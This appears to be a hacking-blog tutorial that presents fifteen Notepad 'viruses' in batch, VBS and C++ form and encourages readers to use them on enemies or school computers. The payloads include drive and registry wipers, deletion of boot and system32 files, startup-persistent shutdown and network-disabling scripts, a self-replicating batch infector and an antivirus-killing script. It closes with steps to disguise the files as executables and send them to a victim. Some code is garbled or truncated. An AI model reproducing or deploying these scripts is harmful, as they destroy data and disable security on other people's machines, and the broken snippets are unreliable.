Create Dangerous Virus Using Notepad (NEW)

In this article we will learn how to create simple but dangerous viruses using notepad. These are very simple to create and use, but don’t dare to use these on your computer because these viruses can destroy your personal information. Where to use? You can send these viruses to your enemies or if you wanna try it yourself best and my favorite place is school computers.

Let’s get started..

1.    Open notepad ( run > notepad )
2.    Put the syntax provided
3.    Save it in the correct extension.. for this replace .txt correct extension like .bat/.exe etc..
4.    Done !!!

1. RAM Crash Virus :

goto thehackingsage

Save File As ramcrash.bat

2. Wiper :

Deletes everything in the computer’s drive.

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Save As wiper.bat

3. Registry Deleter :

Deletes everything stored in registry.

@echo off
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Save As registrydeleter.bat

4. No Access :

A good Halloween prank for your friends this stops internet access of the user.

@echo off
ipconfig /release

Save As noaccess.bat

To gain Access type IPconfig /renew in CMD

5. Shut Up :

Send your friend a little message and shut down his computer

@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” –s

Save As shutup.bat

6.Crash Puter :

This is simple virus that crashes the computer

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”

Save As crashputer.vbs

7. Ez Formatter :

This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives.

rd/s/q D:\
rd/s/q C:\
rd/s/q E:\

Save As ezformatter.bat

8. Shutter :

This virus can be very annoying it shutdowns computer every time the computer is turned on.

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.

Save As shutter.bat

9. Rest In Peace :

It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for starting up windows.  

Do not use on yourself .

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save As RIP.bat

10. Century :

Shut downs the PC hundred times. You can also change the times pc restarts by replacing 100 by your choice.

shutdown -s -t 100 c “Installing Updates”

Save As shutdowncentury.bat

To Stop type shutdown -a inRun

11. RIP v2.0 :

This virus does the same It also prevents pc from starting but in an effective and better way.

del c:\WINDOWS\system32\*.*/q

Save As RIP2.bat

12. Freak :

This virus disables the internet forever

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You have maxed your internet usage for a lifetime

Save As freak.bat

13. CMD Matrix :

Don’t think i am telling you about simple matrix falling effect of notepad. When you run it, it makes matrix out of the batch file. Don’t run it on your pc

// ViPUL in MaTrIx
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
char buffer[255];
char inputFile[]=”C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat”;
ifstream input(inputFile);
if (!input)
ofstream fp(“C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat”, ios::app);
fp << “@ECHO OFF n”;
fp << “START C:\rawr.exe n”;
fp << “EXIT”;
while (!input.eof())
char buffer[255];
char inputFile[]=”C:\rawr.exe”;
ifstream input(inputFile);
if (!input)
ofstream fp(“CLICK.bat”, ios::app);
fp << “@ECHO OFF n”;
fp << “COPY matrix.exe C:\rawr.exe n”;
fp << “START C:\rawr.exe n”;
fp << “EXIT”;
system(“START CLICK.bat”);
while (!input.eof())
system(“call shutdown.exe -S”);
goto START;
for(int i = 0; i < 1; i++)
int num = (rand() % 10);
cout << setw(4) << num;
cout << setw(4) << “0%”;
cout << setw(4) << “P”;
cout << setw(4) << ” “;
cout << setw(4) << “)”;
cout << setw(4) << “#”;
cout << setw(4) << “X”;
cout << setw(4) << “@”;
cout << setw(4) << “1&”;
cout << setw(4) << “*”;
cout << setw(4) << “||”;
cout << setw(4) << ” “;
for ( int j = 0; j < 5; j++)
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
goto START;

Save As cmdmatrix.bat

14. Danger X

I ain’t gonna tell anything about this one find it yourself.. Don’t test it on your PC.

@echo off>nul.ViRuS
if ?%1==?/ViRuS_MULTIPLY goto ViRuS_multiply
if ?%1==?/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if ?%1==?/ViRuS_FINDSELF goto ViRuS_findself
if ?%VOFF%==?T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if ?%ViRuSname%==? goto ViRuS_OLDBAT
rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it?s a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /xn path (chance=minimal)
attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
if ?%2==? goto XXX_END>nul.ViRuS
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
goto ViRuS_findself
for %%a in (%2*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS
find ?ViRuS? <%ViRuSname%.bat >xViRuSx.bat
find /v ?ViRuS? <%2 |find /v ?:XXX_END? >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS
echo on>nul.ViRuS
echo Exclusive THE HACKiNG SAGE

Save As dangerX.bat

15. Antivirus Ripper :

You can guess what it does by its name .

@ echo off
rem —
rem RIP Anti Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A SAFEWEB
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files
del /Q /F C:\Program Files
del /Q /F C:\Program Files
del /Q /F C:\Program Files
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem —

Save As antivirusripper.bat

This is not compatible with every single antivirus but with famous antivirus.

...Done !!!!

This Is Only for Educational Purpose, Please Don’t Miseuse..

Now, there are some smart guys who check the batch files in notepad before running it. Well.. No big deal. An effective way .

How to make those stuff work ? Well... Download ExE Converter : Click Here
1.    Download and run the converter.
2.    Inject your batch file
3.    Choose icon
4.    Version and information
5.    Compile
6.    Send to your victim..

WARNING : All These Batch File Viruses Are So Dangerous So Please Don’t Misuse..

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